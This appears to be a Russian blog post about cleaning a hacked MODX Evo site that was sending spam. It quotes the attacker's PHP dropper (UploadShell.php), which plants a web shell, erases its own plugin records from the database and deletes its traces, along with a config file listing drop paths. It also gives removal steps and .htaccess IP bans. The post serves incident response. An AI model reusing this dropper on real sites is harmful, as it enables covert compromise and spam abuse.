MODX Evo: Массовая рассылка корреспонденции (SPAM).
Служба мониторинга сервисов хостинг провайдера известила, что один из моих сайтов рассылает спам. При проверке сайта на наличие вредоностного кода, антивирусы промолчали. Пришлось воспользоваться гуглом. По данной проблеме MODX Evo: Массовая рассылка корреспонденции (SPAM) информации набралось не так уж много. На сайте одного из MODx сообществ решался аналогичный вопрос "Похоже тоже взломали. Пошли письма". Т.е. на сайт был загружен Shell, который производил массовую рассылку СПАМА.
Похоже тоже взломали. Пошли письма.
Один из участников сообщества поделился некими ранее обнаружившимися несколькими интересными файлами через которые все это безобразие заливается.
UploadShell.php
<?php
require_once $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php';
$file = file_get_contents($filePath);
$res = file_put_contents($uploadPath, $file);
global $modx;
$pluginsTable = $modx->getFullTableName("site_plugins");
$result = $modx->db->query("SELECT id FROM $pluginsTable WHERE name = 'exp' ");
$count = mysql_num_rows($result);
if ($count > 0) {
$row = $modx->db->getRow($result);
if ($row['id']) {
$pluginDel = $modx->db->query("DELETE FROM $pluginsTable WHERE name = 'exp' ");
$eventsTable = $modx->getFullTableName("site_plugin_events");
$id = $row['id'];
$eventDel = $modx->db->query("DELETE FROM $eventsTable WHERE pluginid = $id ");
$modx->clearCache();
include_once MODX_BASE_PATH . "manager/processors/cache_sync.class.processor.php";
$sync = new synccache();
$sync->setCachepath(MODX_BASE_PATH . "assets/cache/");
$sync->setReport(false);
$sync->emptyCache();
}
}
unlink($filePath);
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php');
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/UploadShell.php');
echo $res;
die();
FileSettings.php
<?php
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
$uploadPath = $_SERVER['DOCUMENT_ROOT'].$uploadBasePath;
$filePath = $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/'.$fileBaseName;
$localFilePath = '/var/www/jonin/data/www/niblocklogistics.com/retro2/protected/commands/'.$fileBaseName;
Решение
Проверить папки с путями, что указаны в коде. Удалить файлы, что указаны в коде. Файлы Shell'а содержат обфусцированый код ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"] ... Так же необходимо удалить папку temp, которая лежит assets/cache/.
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
После того, как вы удалили вредоносные файлы Shell'a. Пройдите следующую процедуру.
- Произведите BackUp всего проекта и Базы Данной.
- Обновите Вашу систему управления до последней актуальной версии.
- Смените пароль FTP доступа.
- В файл htaccess добавить правило
Order Deny,Allow
Deny from 80.243.184.227
Deny from 77.59.166.128
Deny from 146.185.239.19
Параметры getImageList MIGX
Создание страницы с ошибкой 404 в MODX Revolution
RESTful API в MODX Rrevolution
Создание тегов, меток или хэштегов в MODx
Документация по pdoCrumbs
Документация по pdoPage
Документация по pdoMenu
Настраиваем турбо-страницы Yandex в MODx Revo
Авторизация через соц.сети в MODX: hybridauth
Условия в MODx Revo сниппет IF
Документация MIGx
По шаговое обновление Modx Revolution до последней версии
Документация по pdoResources
Форматирование даты в MODx Revo
Облако тегов в MODX revolution
Перенос MODX Revolution на хостинг или с домена на домен
Настройка ЧПУ и htaccess для MODX Revolution
MODX - Добавление reCaptcha в FormIt и Login
Работа с ресурсами в MODx revolution
Вывод даты MODx Revo
Документация по getResources
Как создать карту сайта в MODX Revo
Проcтая форма обратной связи на MODx Revolution + FormIt
Как сделать меню на MODx при помощи Wayfinder
MODx Revo - поиск по сайту SimpleSearch modx
Быстрый старт в MODX Revolution
MODX Evo: Массовая рассылка корреспонденции (SPAM).
Возможно, вам будет интересно
Создание страницы с ошибкой 404 в MODX Revolution
Для нормальной индексации содержимого сайта поисковыми системами крайне важно создать страницу с 404 ERROR.
Проcтая форма обратной связи на MODx Revolution + FormIt
Создание формы обратной связи на сайте с использованием системы управления MODx Revolution и дополнения FormIt. Данный форма позволит отправлять данные введенные пользователем в форму, отправлять на Вашу почту.
Создание тегов, меток или хэштегов в MODx
В этой статье рассмотрим, как в MODX с помощью дополнения Tagger добавить к ресурсам метки или хэштеги, а также как их использовать для поиска соответствующих ресурсов и создания облака тегов.
Форматирование даты в MODx Revo
Многие не знают, что в MODX Revolution можно очень просто форматировать даты и выводить их на русском языке.
